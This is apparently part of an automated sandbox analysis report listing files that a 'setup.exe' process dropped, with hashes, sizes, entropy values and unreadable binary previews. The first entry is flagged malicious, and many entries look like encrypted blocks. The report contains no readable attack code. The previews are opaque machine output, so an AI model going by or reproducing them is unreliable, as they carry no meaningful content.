              SHA-512:D606A884C9AB12FE9573784C4D361E6FFF513E91701ACEDDC932C4DC6A936F33C657E31388BEFB7A1BD059DDC2567CD06C65E4F0C2BE1F6BCB5FC782F130F0D7
              Malicious:true
              Preview:. ...l..+..$l...*....*n..:y...+...,..{.y.....a.............I.K7.[/B%.,..H....11..u.2":...T3s.~........ ...8e...S.u...Fk..z...r..w....4u...}...D.b.ie..T....#..l.O.e{..Z.....r.....4g.8.a..!.p0F..W....r..Z.... .....s..E5Z.2.!...W_e...|.XU.U+\s..9.T\?t.7..m|..m....k.....b.P.....-.Fh.\..:Vxyk..bc..`..#..,.....dwT+.........%rB$.......V[.x0........w.TGC...W.z.{..I.Cu.....c.Cqs5LD...-....{.....E.3@.V....n.fC.f....Q..@..G..-b...:h#g.>|....../.&.....z....O...'..jt.......B..D...QB/.zR..fj.{n.`.V......kY....O...~.z].].u.T:..r.{..*.j...#.D..E.-J..0z.A.E..#".6 .y.-z`.=...f...z&MJ.E..I.....7.v}.&...c.......j/.E...H....>.h..T....z.-.F;...~........8./..r}k.Ggg`.c..D....C.}!..K..-K..9...A>.L.P...v...........%.].L.....54..DT..p..v.m....z...D.v!K7Y.a....(...=.u_.-nk..}$.?7oF.J............=...{...............q..P.v.d.~.....E..v.\~..9..6.6.%.z...<....`.Q.Y...D.*.b.p...%Q.../9.... ...r..:f.=...O....IGtO?u..?...p...LX.Zh....]Z.'..#y..._...x..3pC..Qm... .8,|.|.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.374990386360402
              Encrypted:false
              SSDEEP:6:2vykaU6F1aP1aY0+PSAr1OyBD7eavk33PmXkNF9NrsKQVaWsXkNR2cii96Z:uZ0Ckn6DveaG3PhrQTsMR2cii9a
              MD5:8659980EEC6F76B46E79EA8FFAE7AD7D
              SHA1:FD2F41A2946F5C9253F0283B41D6CF67CDFB9012
              SHA-256:C279A5B5FCBB0281EB95ABC548C2D4B75961778CDAB94726538179C2C92CA120
              SHA-512:1348170BA60B6221FCFF16B2CA39E569C578D9C7CFCB01CC76EAB94DB78698565865794DE1EDF0AED950922CECE8F6BC0AFF03107177E75DC8919B3A0A43C59A
              Malicious:false
              Preview:CMMM .......8uQ...\..;W..........h.w9...j..X.5.....P.ZS....6..I..:...F.........?2`.. 4}.w..S...T.-.KQ..=o..d..z.k.\W ..!...p.,...Z.4h#;.....x.]..t..........#R.....B.N8....G)....k...1..@x..E.../........_k.'.0`....|......a0X.#.../....{._%Gf/G.........tl)......$...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.3258385092484115
              Encrypted:false
              SSDEEP:6:JxkfVHb8qeDHOOxoDVnp5odhlLfMGESmr6FZa0WsXkNR2cii96Z:JxW2t9xg94RM1SS6jusMR2cii9a
              MD5:66438E6DFB960E6654ABC7224B217962
              SHA1:95AFEA7E392E8779176D937DF2A0FD377773AFF3
              SHA-256:F59064CDD1A4D436C5A75385CBDF049B75C929A723B030B54C9E6D9FBC6625CD
              SHA-512:DA823FF84DD5BB6DCCAEFBFD3DEE0F069878012FB764E062A4D5AFDD73F446609524E866A0CD201DC88B9AC174D333E4AAE8E263CFFC1029BE6F41895B3CD053
              Malicious:false
              Preview:CMMM ..*/.`.oI....i.c.}z....i.....r....@`.Y.j.k.1..)..L..\.?+..0..k..V.J..%h....lZbn.....HZs..E.(c....Q_.7.....}.d.A.......].?...D[...!..#.$Q...n,..f....`w.>.../.)..(.t..0.Q....v.[.N..h.b.#.p....._....IH..@...z:.Y.x..!..y...g..u.Z..T......G=&.".\.....d.......Y..E....R.GY.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.267286753610115
              Encrypted:false
              SSDEEP:6:PugNlgPaqWjjdpmK5bWy+fF5Rjtqczr9Nt6aixlMM0WsXkNR2cii96Z:F3zTfdpphWyyFdzhiaixlNzsMR2cii9a
              MD5:2979CC930676B64615B9A79A1B3CFA18
              SHA1:8F2DC8B19CB68E925CAC72828DC9279CCA1B9224
              SHA-256:009472F728955D710A72CC912912090194202431C9CFB4AB6ABA246293381F52
              SHA-512:10F7C10C4FB0C7BA463485FDCFF7340FB5F47D0F5BF861E7D2291D8177E5D702346629098BBEB41E091302C84F7FBBAF607D9057E1C5FB7BF5706812901E2696
              Malicious:false
              Preview:CMMM y..."&YJ.:o._K..#].......@.1..c..W.{n%..<. .R....F.A.P....B".t.d..w..W....{.......;3/jN.n.DWG...\....a.J_...2I.t..p?..5..1:....} ..Fr...........*...U....kG.y...sP..3O/..W)....`~...9.g..MIV.H....n.o.},......1.EY7.Q~.r..[g.C..v..<.s..Z...\%H.G..I8-.r...;....o....a.0VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.27509885272221
              Encrypted:false
              SSDEEP:6:2Eva/vXVOfO5ykEkWdttRwGvh4xoqj02TUiuzxazGWaWsXkNR2cii96Z:2GCvXGcEH9RjUdj02TUNEqW5sMR2ciik
              MD5:91123E7EA9DB78E34701AA13AEEB0DAE
              SHA1:569CAF188DDDBA4869C76AA062E6A51220B64F13
              SHA-256:C73C290BF0FAA01ABE71D0D23B6D18FC44037F274D5A94CD4E2A9DF644D1D63F
              SHA-512:D2A5050BCC682522A337FB81A5DDEA211C99F516EE53D7B0BAC1C6FC157334CC5317AB301BF0F4164EEB8894FA051E740B30A36965E7D377E0D8CD13C7A0D0F2
              Malicious:false
              Preview:CMMM ..RIo...[.(.)...JH..`...|....#V.d.a........C=. u.....]g...[|KmW..o(.{.M..F.....W.kih..,3w|Lut)C..K*..j........$6.> .O....r....Z... .h.!.@^..... .E.Jz(....7xX.X...<.{..i.!....Lt..1.4.....r...'...:.=. @[.L...h.............Kd.......e......M[ML..L..t...[..q.T.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.190309163172935
              Encrypted:false
              SSDEEP:6:mAcU3TBtJVqQPj0D5gnSR0RVUrg5hgq5a0WsXkNR2cii96Z:qUDBrfPjCAVUrg5T5usMR2cii9a
              MD5:79A25EE4AB8ED2BF98BC228D50D6E771
              SHA1:C470DF004D878B086220841798F305D5A99D8E5E
              SHA-256:5FB452D4D7985BC2D8CE9E048AC2E0F635B153E2342B2C70FD973011D08840FA
              SHA-512:B3EFF300BB52A082AEA6A1F4533B69B35E62E6901AFDDE5EB0A4D7ADA1C0523BDF8BE1A42330F3022EF480AB349911A3CF15AFBB4A6E86A59CA7D7394720A2C5
              Malicious:false
              Preview:CMMM ..%..67.. @.@..E....2y}...B.i.b...9.p.gz53....5..c..\..r73w..VTb.....a.....j..I.y.&..q.2..4.t.E..D..5y...Y.?.........B.Q..@......w...gN.........bh{...|<.....c".@...?l..G.z...g.}pu.u.T.w.1..}..%.\}..`.'VDC.Y..4.f.-.....f.....H/.R..4.V.C..........{.2-.<[p.@.(.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.345563534577447
              Encrypted:false
              SSDEEP:6:EAB96CO52ihIC7zZm2l4cQAdsMMjNTOU0xu+5IC7Nb+48XoRVZQxWsXkNR2cii9a:n9g52iGC7E2l49ldJaUA7Na48KUQsMRw
              MD5:CDBF9AAE6B8D2A8F1D2875CA77BCE76E
              SHA1:32A4DD879C9183FBE72680585F83D421321D7EBA
              SHA-256:C4F80B173DF0727E23BF9E150B9BFB144289E7AB6D8128DDB44EF9019D486078
              SHA-512:CF4DF81CDFE8233BB196DB9616AB8210EE42CAA2AFD7FAFBF57C966BC36953610F2A534D68B2C227BDE9C7B2CBCB5FAB53A9C66E7047A8291148C8AC95CF2EAE
              Malicious:false
              Preview:CMMM ?R.Y\.RB..AU...4.'[....L......Q<.lLf...'....o..4...4....)..EX.F....]q..U...........=.3....^....u6z.\.CO..QA..@.A+OP.i.......................:....$/!5.l....I..J,...Y..g%Q..I._W:.'_...]dN..4.j.....X....7....\"..a......s.e....@.8."y<....J.^.. ..f.....F. ....E.I..zVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.269051933626174
              Encrypted:false
              SSDEEP:6:cTEifOlKxkrmfFIPR+1gNLyxeEY/UdXcGdKC3F40WsXkNR2cii96Z:Ho6PsgExeETxIsisMR2cii9a
              MD5:08BF5952A739AEF52A4D71472BBEA2FC
              SHA1:2EAC2C93485E20917BCBD61521D1D3D97ED3B2D8
              SHA-256:CE0A0EE3039F2A508313B114B1DA251FE267FDBAD48EEDE7F658714841C019C8
              SHA-512:527D7E61D730F3C303D5776BB12711BF767DFEB3E63ED0FF1F343AEA2D339270CDED6F7AC76B4E977FBCAA486B1D26F5DACAC68EFF2D4A350E73BDA018C218B3
              Malicious:false
              Preview:CMMM .S...V....!.......W.*^yz5...k.........Y.K....Q.c...s..9._...O.Q..0z.r...T'yN.g.........G8|....|j..L...%b.'~0.v.....Q...a..b......l...A.......Uz.R\L~6.IW}....:.....|..N........D+..A*w....X-LY.T~X...Z@..[....3.|$W....... ...B......5.H....r.9^.c'...E)._;T.h...+..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.306061552873322
              Encrypted:false
              SSDEEP:6:2n7WoO+u374OSRJihh7AAM01Lf1A33rNx+kiQFcEM0WsXkNR2cii96Z:3ki7rhZV1tADzFclzsMR2cii9a
              MD5:EDB65D96BDFA1E4066AD4C016ABFA4DF
              SHA1:F307C65368109930C956F92DF2709813A8CE6437
              SHA-256:C7EE0847D8798B78BADB6BA01F835B51297958D31719C3CA4194AE7615331B07
              SHA-512:281FA27A23534060DA628AACA9906D0B381E354FB3537FFA13F01AF8F0BC9D021DC539569BE019BCBC5B99A48BDC0CB3057A749EB3DF3AB5F217EC7413A84984
              Malicious:false
              Preview:CMMM .o..2.."..7......D+..b.2i...*.jTB.U...7..............H......L.FC.e.#u+.b>/|.E>.....OYt........Q.C....1.!....1.....0,.Tl.uy..i.<)...=.s?G._....&.8O.....K.=..L=K...q.vh0......b")e.e...{NB.p..de......jT...*...x.zzpvb...9.4.^U.......^.y....X..1.......1..%#...|...A:VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.236461160203252
              Encrypted:false
              SSDEEP:6:K8+cA73j1E3st0OdfN+IJHfkn0dbgzQRVF26zaANY0yDXWsXkNR2cii96Z:DQK0l+IJsnobpRV7aANtySsMR2cii9a
              MD5:D1F7812F975DEDF8D8B03A1B20D2ECED
              SHA1:A2F507BF9A6793681EC3EF7A453289BB9DDF616B
              SHA-256:676A3A6DEFC99EBDA616B37CA12BB4FBD69564E1168BD5B7C64968D93BCBB92E
              SHA-512:BE61C2F436210DB38320B2ABAEC7D85B24D4B085087D9E7132E2E2AED03955DBDC3F38E7F7B7C0DFDD32E3FB83C0291DAFC13F401D33006FABA838A54BCF1143
              Malicious:false
              Preview:CMMM {...F.6:A.q@.[.....~.Rf(|(..b.-....48.fN...M.%...Q..D.d.d.'...:":o....(.nY.b....."....@.v...J........3.%l.C..".5..f..d..$./.M..@wcBY.s.OI...C......b.J.....N...*...o.U?MZ.%.!.^.....Z..W....pk.@.lUR.`..Bp.Ht5.4...G.q.c|..Eep{...........?A..2.R.#n~s%M...Z..J8..V...msVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.309429841703923
              Encrypted:false
              SSDEEP:6:c7eLkUnT1XUBSWTcSxORluqdWh0HFZW8ps2LXJtThliUylsXOWsXkNR2cii96Z:hLnerVOREqdWh0G8pfLX733lsMR2ciik
              MD5:D1A6266B951DE31FAFFB76A413CA2A87
              SHA1:51BA512B76FAE393ECD88DF25ED9F0227CD93195
              SHA-256:351A1F7AF4B85077FC640E9EEFB6678AB83992E8DDD682DFD7EDB4D2855A0FF5
              SHA-512:92344A99189C48E2794E4BDD56B9A1CF32D8D2967E15C725CDF46D77EE43CD4BE0F219ACD503C160511444F5447C0738A0F6249EFBFAD37FB5931446FF6AA688
              Malicious:false
              Preview:CMMM .%."./.`...=..^. L;.)iFyM..B.(.@_o..D..u[.\_.K.......r...V;.N`.....E........_..6.f+.M3..s.c..Oa1 .....;'......z.-...k6O....hf..........y.b..8..). }.@..wi..9?...V...ikP.=.c.W....D.O4...x..o....<..f.....lOI8.`.~.;.......O...../.|...........qh.6fLs.....O...2.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.31479033333165
              Encrypted:false
              SSDEEP:6:pV6MOgQWkXOVAU2FGJI7q0sjp639AchDHnEJ9ACVyOWsXkNR2cii96Z:ivWkXOV4FeImcychgJK1sMR2cii9a
              MD5:44EE2B2367DC40BAFCA8CB62CD84A69D
              SHA1:47E82D24DB09B46A73CA43FBA654DF43E58A9986
              SHA-256:1BA5CA92FF6FB40DBA7B5B3341B228750314C82A128F52D8F6D823DC0DCA8851
              SHA-512:5BBE3257E1673155D8D7252CFF57E9370364FBBA69C230D5BA765FA6DD9C8A176377E61E4F1EBB5A9DBD37B570EA227AEE8120FA565752FD317D6AE233EE31FA
              Malicious:false
              Preview:CMMM .|.r..=....*...Cw..>..^.".c...>....X.........4.c.....j%........#P/..!..Y_.+.....2.....n.jv..F#.(.\.J4.....'.8`.>..F...{.*N &...[.-..Kh...t..(./.t..*<..#..m.L"s....a..%8.U..:.......`....L.9.$,....r.(#.r..H..S*.....5c..m.41.]....8.2rm.eg.c.........Ku......W..RrVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1048910
              Entropy (8bit):1.7684276510633221
              Encrypted:false
              SSDEEP:3072:N1jZVj7Su1K2JiZHFrwxgCCVJbXs67f6DlXrqRHC83YQjZSMbQFYOy:N1VR774axWjbcifl3YmZSR+
              MD5:7CB6489748491EDBC0498C7308A3BEC6
              SHA1:8C631081AFAAB89804C4475EE7A57536E36DA555
              SHA-256:D7BF15F192E1819BA6EFE9E4F276715E69645DAC199674C480E144A6712390DD
              SHA-512:19B72F96FE479C4BC6767F21DB43F47622F3518D5BB976FDF7BEB094910C4EC0763695D320B12B95A3B8763A449E7CCA2D8F16993B451BB66120094962188823
              Malicious:false
              Preview:CMMM .]..... .b....Q...,W..............$...RI79...H^n.y.@7N.,.r..h..m..m.O.;>..Gq..w..*h.......6@.Y.....l..!rK...O....N*]P...O.!....4..'.....=....[m$.B....../..;...R#.b.....\x ).u...%i~.Z.,|b....z.[.p.(....V.{*..F.....<9%.+)......n.U......J.`..fR..+.._.j.5.p..vK9.) .l..f._.z{..S.H[B4..:..SJ.pk.Y.."....w.....F8...`..}C...I........nX..1..u.....U....k.6..n.P9l....&2....cX........a*.d..(...;h.k8..'..{.<..3K.....~..D`.w..)....r..yMX'h-v.+.p..H....}...:.q,.. ._....C`..J.-...\...".E..Y....!h..Lu..4V..!.z]..H..F.yR.J.K....V0.'s..&v.....q..&.U..J..E}.g[....w..d.f3+.'....S27r.b.<.<.d+.-....\Z..Q.qb8..?d%..+....B..>.k...C.I.a.....=.MP.PB...`.VK...o._.7.-.EW.i...6...9..$nZ.....M..~...73.......J.\.V..K.t:_;.$I/..h.F..Y.z}..q...g......zJXx....x.[*..T.\1....#!..=..T.v).u...~n.....3.'..<..m....q..%./...aa...c....5{)...u..;..F..NvG....T.r~.8U...T...tT.Z"..,q$........X...*.......q8u.Qk..^.J....(.5N.....D(*.S9.)I..k..&^9.x.+..cY..:.q.j..........C. +5..A.C.C..zLC.6.l..m.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.266917883746176
              Encrypted:false
              SSDEEP:6:gxuY5ex+WvroNeA3+C6ypCRNVAKvmc2sEoYA/flHe9OWsXkNR2cii96Z:SH5ePa+jSCzTnYAVHKsMR2cii9a
              MD5:53B1FB24887C79C40187A8F266F4F5E8
              SHA1:16437F2D348B9E3F8508FBDF4DFBA7AEB894E6F1
              SHA-256:725A0A4830148D7621C8BD1F33556DC5EE5C925A394BA3823A770F6AF4895B49
              SHA-512:9A7AB502A74841467B486E43864B53E90FB8163D19376983722C808402FCBE66647A66BB91F860395F36B7E26089C4A151A8C039084B844CEE8BF6D0BA71EA1A
              Malicious:false
              Preview:CMMM &.:|..N..c..c..W.-.o?Y.v..0.-.Vrk[Ff......_.0u...........0[....[k.4..r.):..zV.[.........yh..t.e.......9M..Gf....*....9k..l.1v..9/Dz...[y.>.}..4.^R....U...Uc....U.NQoUM.$...?5.et%]l.......J@jq..p......)e.6...I...G.1.v..i...K....5....[U/qnM..@r...(..>{.i.(..i.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.2422093624685315
              Encrypted:false
              SSDEEP:6:ixIuZC40EvyfeP8tggT7SL0Q07g6Z2pniULwK0ejiRWsXkNR2cii96Z:iuuZCfEm/tgg3Yr0kRJff0ejPsMR2ciD
              MD5:EBF3C24EA065EF96590D9ECAA9EB86B9
              SHA1:C647E9D5D8340BA66E94D3C1C5C6A441C1C75199
              SHA-256:459D1A2456DC84357EA811DA161322A719D295FD443FC523897008865EA77D8C
              SHA-512:9B3E3EF41ABCCC1102A313BFFBA94EAD0A14D625A50828BDCDADD17B51106E8AECA21D6B6FDD2358021ECEBFAC64BEB1772DB647160D017C1174E1807FD0D8DE
              Malicious:false
              Preview:CMMM .....&)[...W.p..K.........!.u....v.A.R.........T~.!.j..!..u|.i.c.7>....w............?.......rc..As.~7.;|...T.....3v...RNxw.,E...,{:.02...g....N.j......]..aB{..C}e(.~KF..c\K...9.......s...U$..ecf*...C...38.A.;.p5.9`. ......y.Y....^L.v..6...Q4A|K1.....#..!CVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1048910
              Entropy (8bit):1.7688474930253253
              Encrypted:false
              SSDEEP:3072:Ex4PFJU0xhrbe/rY71+BkQcUBt8yMDG8eH0nUyvkd3R4otK7:Ex4dhGaQHtfeeUUyvkptK7
              MD5:2EE87D91B6C0A3A6C79848FAA8F83FA3
              SHA1:DF36DD06CB08FCCF30396B9FA222AB3F3942D5DA
              SHA-256:669A28BD61350D624E45A3D51A382713F55999A32B9363663C8AC9D01C75AB6B
              SHA-512:C60A7CAD4E3CFC2CE9D144BF952D5FE41B35F0F268B72026900F20378A07C47C16CE976446EDD450FFAC4323FCCACB16F8B7E8409ED92839E5D6F11A960D36A0
              Malicious:false
              Preview:CMMM 9c..L.*.5>C.....;q....`l.0..^..y`[....:i.......v{`r`.,G.+..K.0..(....Sc.l...~..3,.5...K;y.!......N.jO5..\......G.........up.K.<.)v~.$..Jd..qJ..3<..Q..R.~....C..Q..L..tq..iJ=..Sr..m.5..8.2.....;"..}..5x....~...;c.y$..Q...SJ2W..M.._[...1..!.._..[u.".P.....q=,.A\.[...-.......x....i.|.t.Q.F.~.6....\.....7.Gd'sx...@!zt_./.&..........kPd..C.W.I..z.GR....v.....@....&6...H%.w-,...........w..6......S......99..O.G..........M1.I......j.S..O.z6L4j...=...).EG..d.....]...1...%9.......-L.?M.....I.8y'.3...).b...I....%J....8.-*Jpl.y...i....N.[..r[......H...<.)0......e.zf..Z....yh..3......i..Lj....Iv.7...B..g.....$k....24]Pn.,........_Z..K..z...:2-..v2.30....k.U.Cw.V....5..A....D..d...'..#..66.>....I..WI.,..c.....w....?..e..K..O.1.k...{.......4a.:.#.4.-.....f;..4....!A.U.H...^.....d.$Q.2...5s......g\d.r.s.$.E..Sm..8.:..<.f.$t...'...\.C....G.7...:.b`.U$(.Y#.Y......R .'....s.U.<.-@.d.,..."...jr(.L...g.. 5.......k.*.#.......Z..j...6.O.e.m,+=
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.344129700549575
              Encrypted:false
              SSDEEP:6:itNDzy/cXgOK8dZTM3erLXZYGnxxKy+Wm/fQ+jMyR9EKa2V0vRwMS5WsXkNR2ciD:itdUcQ2dtMOHJrxM/fYU+a0eMSIsMR2X
              MD5:E976AE71C66A49D24B5ED7730C3D3A89
              SHA1:FB4145902011A3101C9519EED3E0782A813464E1
              SHA-256:F642AC9AE5B825462B481FCF02CB2BE9A02C2E0ACDB69170E05E99A8EB3ADE96
              SHA-512:1F210E0C48DBF1DB421A96FA1DAD8CFD99D8892370C38AA7CC5C7D8542F80560C06375E2891AD4DF5C4153B59D0237CA19E60023F60835C540E2C76F2BEE97C2
              Malicious:false
              Preview:CMMM .j........2..0h...] ..>V..c(8.P.n.c,ko..N.*.O..%........)$H=wpP...M..A...j.>8'../VU.b..N.=c..N.T........>.. s(g_..w./.@..\.....6&s"...................5..L.......4C..b.b......Fc.<E|v.....P......y...<...dUxm..Y.;.._F.?.W..T.X&..l$....H*..."o..g........./D.v..QVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4194638
              Entropy (8bit):4.414895954929741
              Encrypted:false
              SSDEEP:49152:hSaFfndNVegH9KyAPVr//+qrYEB2xsgnv:8aFfndNVegH9KyAPt//rYEB2xsgnv
              MD5:846157AD953A68B5637437EF820B028C
              SHA1:7B24714412EA0E1959134FFF64D2C449BAA9AC96
              SHA-256:7467A54CFB2BBC194D26DDF6A05982D798C730B47A2E985D5E1DDE93B936B047
              SHA-512:3A79878478C95AF7D3AE252E3FF4C3B03A4C675237CD6F071186251315FF9621C75C8CDBFF0CAC0450A84CCC8463734F15FD8C63AEB9D83C34E0B43A587A0718
              Malicious:false
              Preview:CMMM .-c5E.N..3...;g...b.R....g..[38...p..!.|..;..ws\...~..(...syp..').1.?.A.]...3..egZQQ.tm...*....H[/..l .vQ...C7.F..M%...2.......%./...q..b,..6(..T....,.e{..g$.n..k.s..$O.....A".Pa...8.H.f.V.._..eBV.oJ....Mk.v.....M..M.^.,8...L...b,.}...f.|.)..-...X.u.c...R......b'..@C.U@...}HO.]OJz.Dt....CU..C....A.~A....S...r....O......]....~Lc,.m.x.....@........;;Q.M......P...b..k..8t.j.4.....du...yP.p.\.9.d.Eu...B..x.J..*f,. ......8....f...vP@..I.p.c_.R......3!.....A...b.revF..0aN.....dU..~.G.~......./...[..|:...y.8..H...x(.....n._.........G.6....+.;k.S...B.=....d.../v.NhV.../.0..M...S.V.g:.....^....w.V...S8........G...>.z.*.~..._$].D...+.z%.4......K+m....2Q....~..!.s...........6.D.}.....gYq..;b..8r...L.3$...\.I.....cf[![n%g..@...6.n.;1Q.P.sO(zy.Y...@.7.q.J........dP.....]Mf K.td..N*._..-..50.Z .....O......y6..K.|.9..n7....b....z..A.*....|../../.J...,q...&.O.\...5........b...t5.-0Z".2.........^.y.=.py+.k.-..\g.J ...d..^J.....y#|G=R.7..g..?.l.. 8.,
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.31877335558087
              Encrypted:false
              SSDEEP:6:B6L4v0AKWWfOYR2mgafuwsww32cT/ROXkXedmqhqWsXkNR2cii96Z:B6EbufOc2mRuwsww32c14/dmwJsMR2cq
              MD5:F292663D9C502DDBC5C63559526C0661
              SHA1:F6B4F0A0EE83F63D7930BB8D26C04F1D01EED1BC
              SHA-256:6931EF6DE4999BEFED03BEDE614D8995CEAC65CF85B065F80724757D7E0C460C
              SHA-512:C2DBDA2934042A818D0F0A20FC265DDEAFD79EBB65B9F1C9CD292A3974E74B738E2ED9E0C955C80205987E6DEC9923D3918DC8B6D56B3707F9728B0BE4F959EB
              Malicious:false
              Preview:CMMM ..J..hE....].q.DQJ..9..75...`.X[.a..U..@......;....N.K.0.ysK3....U...Q..u..^........P2.f..kV.j...Cn....\Q..s....Q*X..vC..D..ag(.{..e.o...i..-.eT.rt..x.yv.bK.G.=A..K.SwU....Us..n#...;.b...=./...."....Z.%.....%.}.L..X.?&.zSa..W."A.`...)e..m..A..p.?pM..SD........FlJ.r.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.299795736811396
              Encrypted:false
              SSDEEP:6:Jkmnyg9Ay510AQ7v9t+0fSQNas3f0VxAjPmYce1gwHp/1yrWsXkNR2cii96Z:0SAyAVt+0DNasPuxcgVSt3sMR2cii9a
              MD5:6AAE2293BD5F11D743E27938F551BA16
              SHA1:8792779EEA70218A00E685B6C770C26760237105
              SHA-256:F24240F3C2813B26000A7D03C7B02168DD94F605245B4133B6B67B19E5483281
              SHA-512:88BE6A4D3CD49B475A92BDDABD43D63598472F9ED3ABA4B5780A8118A3C4735218DE822824EC965C7C1CC560DBF4BE4E56BEBD7FB3263B9FF2E4B2A55489BC48
              Malicious:false
              Preview:CMMM ......)......dP.M..{..3t[.!....<...=Bc.8.......B..........P.j....s>.B.s...3.j..E.'.....w8..J..p...z....?.IA..o....~xu....e.p..\-..j.Fn.<qY;..J..a*.}..6${...v.Q.r...G..9'.N..9...V.?.=...........^..p.x......SU..b..}....r*...@@q.]Ij...8...../o.7.....@..%.*......%.+VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.288687042918391
              Encrypted:false
              SSDEEP:6:p5hujml92F9J61h76BXD4JaxBwKO0woNjsp2kzzGaUgacqrqWsXkNR2cii96Z:Lhffy9J6/7OAylO0woNjsp2atUTZJsMS
              MD5:A1A1C211BC685F1E8A6DD395F3843F49
              SHA1:36A14AFAC2FB2B5E65C3F7A71611A18829155B5F
              SHA-256:041EC4999160EC90D42D953945FB787262F4B45C20F2732B03E7A75A893418C3
              SHA-512:036180AB179F0DE51C4BCE8077E0D31AA2FD8C4A9D5F63AAAAF90A7F40E689C3341888B84F901BA42D9C7E1C1F94D1C6E1BE8BDAD6CFE2AE1EECEB9CDBEF8863
              Malicious:false
              Preview:CMMM .7...R.M..U.'..P%.t._<.DN...y#.....4..C...&hn.| .8|.f....u%D.>..h.Jv..^h..h'NM.....r.X..lX1|g..*..E..r.gb.....gq&E...U..tQ.........O;...f..ftq4.2...[...,.~......u.....e(.I......"...&~8.4@Y6.....s.}....3.x..O....:..%...l.....U.Yts..n:..jF.V..,s..E....A...}VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.297057049684732
              Encrypted:false
              SSDEEP:6:/4EEUiZjAjKm9chGPSOLZ093I/5uH6oY8CEllcwcxWsXkNR2cii96Z:/JKfmCsPSeZg3UuHPCEllcAsMR2cii9a
              MD5:0A391CCD67F5C9D4634C7728BED7F083
              SHA1:0A2D66EEA689A88C7E7173F3F1D06BDD51AF2083
              SHA-256:B4EA5B62920C8826A84AB9203385FE1619993786A07E02BAC954CBE1065FC4E5
              SHA-512:9A8A74277B3FC727B26BF84994DCDE554A6E8452E05DDAB2E76ED2C9CDA4E24098F5AB62430FE16797D4041CC3C368459A38555C68D45B3F26BD1A58FF5E2253
              Malicious:false
